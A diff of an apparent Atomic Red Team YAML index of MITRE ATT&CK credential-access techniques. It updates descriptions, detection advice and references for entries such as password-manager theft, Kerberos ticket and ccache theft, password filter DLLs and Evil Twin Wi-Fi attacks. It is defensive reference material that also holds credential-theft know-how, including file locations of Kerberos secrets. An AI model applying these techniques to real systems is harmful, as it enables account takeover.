-          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
-          10, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Password Managers
-      description: |-
-        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
-        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
-         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
-        for suspicious activity that could indicate searching in process memory of
-        password managers. \n\nConsider monitoring file reads surrounding known password
-        manager applications."
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      - 'Process: OS API Execution'
-      - 'File: File Access'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -53521,7 +54167,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests:
     - name: Packet Capture Linux using tshark or tcpdump
@@ -53814,7 +54459,7 @@ credential-access:
         elevation_required: true
   T1552.002:
     technique:
-      modified: '2023-07-28T18:29:56.525Z'
+      modified: '2024-10-15T16:26:46.873Z'
       name: 'Unsecured Credentials: Credentials in Registry'
       description: |-
         Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -53863,38 +54508,13 @@ credential-access:
         url: https://pentestlab.blog/2017/04/19/stored-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.002
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -53918,76 +54538,129 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
-  T1558.004:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1558.005:
+    technique:
+      modified: '2024-10-14T21:26:37.856Z'
+      name: Ccache Files
+      description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+        credential cache files (or ccache). These files are used for short term storage
+        of a user's active session credentials. The ccache file is created upon user
+        authentication and allows for access to multiple services without the user
+        having to re-enter credentials. \n\nThe <code>/etc/krb5.conf</code> configuration
+        file and the <code>KRB5CCNAME</code> environment variable are used to set
+        the storage location for ccache entries. On Linux, credentials are typically
+        stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+        On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+        naming scheme. Typically, users interact with ticket storage using <code>kinit</code>,
+        which obtains a Ticket-Granting-Ticket (TGT) for the principal; <code>klist</code>,
+        which lists obtained tickets currently held in the credentials cache; and
+        other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+        Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+        on disk and authenticate as the current user without their password to perform
+        [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+        Adversaries can also use these tickets to impersonate legitimate users with
+        elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+        Tools like Kekeo can also be used by adversaries to convert ccache files to
+        Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+        On macOS, adversaries may use open-source tools or the Kerberos framework
+        to interact with ccache files and extract TGTs or Service Tickets via lower-level
+        APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+        Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Nisani, Cymptom
-      - James Dunn, @jamdunnDFW, EY
-      - Swapnil Kumbhar
-      - Jacques Pluviose, @Jacqueswildy_IT
-      - Dan Nutting, @KerberToast
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Access'
       type: attack-pattern
-      created: '2020-08-24T13:43:00.028Z'
+      id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+      created: '2024-09-17T15:02:31.324Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1558.004
-        url: https://attack.mitre.org/techniques/T1558/004
-      - source_name: Harmj0y Roasting AS-REPs Jan 2017
-        url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
-        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
-          24, 2020.
-      - source_name: Microsoft Kerberos Preauth 2014
-        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
-        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
-          It Should Not Be Disabled. Retrieved August 25, 2020.'
-      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
-        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
-        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
-          with AS-REP Roasting. Retrieved August 24, 2020.
-      - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        source_name: SANS Attacking Kerberos Nov 2014
-        url: https://redsiege.com/kerberoast-slides
-      - url: https://adsecurity.org/?p=2293
-        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
-          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
-          Domain. Retrieved March 22, 2018.
-        source_name: AdSecurity Cracking Kerberos Dec 2015
-      - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        source_name: Microsoft Detecting Kerberoasting Feb 2018
-      - source_name: Microsoft 4768 TGT 2017
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
-        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
-          ticket (TGT) was requested. Retrieved August 24, 2020.'
-      modified: '2021-06-07T19:23:33.039Z'
+        url: https://attack.mitre.org/techniques/T1558/005
+        external_id: T1558.005
+      - source_name: Binary Defense Kerberos Linux
+        description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+          October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+          APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+        url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+      - source_name: Kerberos GNU/Linux
+        description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+          Compendium (GNU/Linux). Retrieved September 17, 2024.
+        url: https://adepts.of0x.cc/kerberos-thievery-linux/
+      - source_name: Kekeo
+        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+        url: https://github.com/gentilkiwi/kekeo
+      - source_name: SpectorOps Bifrost Kerberos macOS 2019
+        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+          Retrieved October 6, 2021.
+        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+      - source_name: Brining MimiKatz to Unix
+        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+          Mimikatz et al to UNIX. Retrieved October 13, 2021.
+        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+      - source_name: Linux Kerberos Tickets
+        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+          Teams. Retrieved October 4, 2021.
+        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1558.004:
+    technique:
+      modified: '2024-10-15T15:32:07.850Z'
       name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
       description: "Adversaries may reveal credentials of accounts that have disabled
         Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
@@ -54022,6 +54695,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Yossi Nisani, Cymptom
+      - James Dunn, @jamdunnDFW, EY
+      - Swapnil Kumbhar
+      - Jacques Pluviose, @Jacqueswildy_IT
+      - Dan Nutting, @KerberToast
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -54029,32 +54709,68 @@ credential-access:
         pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
         Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
         Microsoft 4768 TGT 2017)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Credential Request'
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Valid domain account
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      created: '2020-08-24T13:43:00.028Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1558/004
+        external_id: T1558.004
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+      - source_name: Harmj0y Roasting AS-REPs Jan 2017
+        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+          23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+          with AS-REP Roasting. Retrieved August 24, 2020.
+        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
+      - source_name: AdSecurity Cracking Kerberos Dec 2015
+        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+          Domain. Retrieved March 22, 2018.
+        url: https://adsecurity.org/?p=2293
+      - source_name: Microsoft 4768 TGT 2017
+        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+          ticket (TGT) was requested. Retrieved August 24, 2020.'
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+      - source_name: Microsoft Kerberos Preauth 2014
+        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+          It Should Not Be Disabled. Retrieved August 25, 2020.'
+        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.004
     atomic_tests: []
   T1558:
     technique:
-      modified: '2024-03-01T16:58:02.395Z'
+      modified: '2024-09-17T19:49:11.455Z'
       name: Steal or Forge Kerberos Tickets
       description: |
         Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
 
         On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
-        Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
-        Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
@@ -54090,7 +54806,7 @@ credential-access:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Logon Session: Logon Session Metadata'
@@ -54115,13 +54831,6 @@ credential-access:
         description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
           using Azure Security Center. Retrieved March 23, 2018.
         url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Kekeo
-        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
-        url: https://github.com/gentilkiwi/kekeo
-      - source_name: SpectorOps Bifrost Kerberos macOS 2019
-        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
-          Retrieved October 6, 2021.
-        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
       - source_name: Medium Detecting Attempts to Steal Passwords from Memory
         description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
           from Memory. Retrieved October 11, 2019.
@@ -54130,14 +54839,6 @@ credential-access:
         description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
           Attacks. Retrieved February 27, 2020.
         url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
-      - source_name: macOS kerberos framework MIT
-        description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
-          for Macintosh Preferences Documentation. Retrieved October 6, 2021.
-        url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
-      - source_name: MIT ccache
-        description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
-          Documentation: Credential Cache. Retrieved October 4, 2021.'
-        url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -54159,23 +54860,14 @@ credential-access:
         description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
           Secret Decoder Ring. Retrieved February 27, 2020.
         url: https://adsecurity.org/?p=227
-      - source_name: Brining MimiKatz to Unix
-        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
-          Mimikatz et al to UNIX. Retrieved October 13, 2021.
-        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
-      - source_name: Linux Kerberos Tickets
-        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
-          Teams. Retrieved October 4, 2021.
-        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555:
     technique:
-      modified: '2024-02-26T14:19:09.417Z'
+      modified: '2024-10-15T14:57:46.850Z'
       name: Credentials from Password Stores
       description: 'Adversaries may search for common password storage locations to
         obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -54226,12 +54918,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555
     atomic_tests: []
   T1552:
     technique:
-      modified: '2024-04-15T21:33:12.892Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Unsecured Credentials
       description: 'Adversaries may search compromised systems to find and obtain
         insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -54243,6 +54934,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Austin Clark, @c2defense
       x_mitre_deprecated: false
@@ -54257,18 +54949,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Application Log: Application Log Content'
@@ -54291,9 +54983,6 @@ credential-access:
         url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552
     atomic_tests:
     - name: AWS - Retrieve EC2 Password Data using stratus
@@ -54361,32 +55050,113 @@ credential-access:
           rm -rf stratus*
         name: sh
         elevation_required: false
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
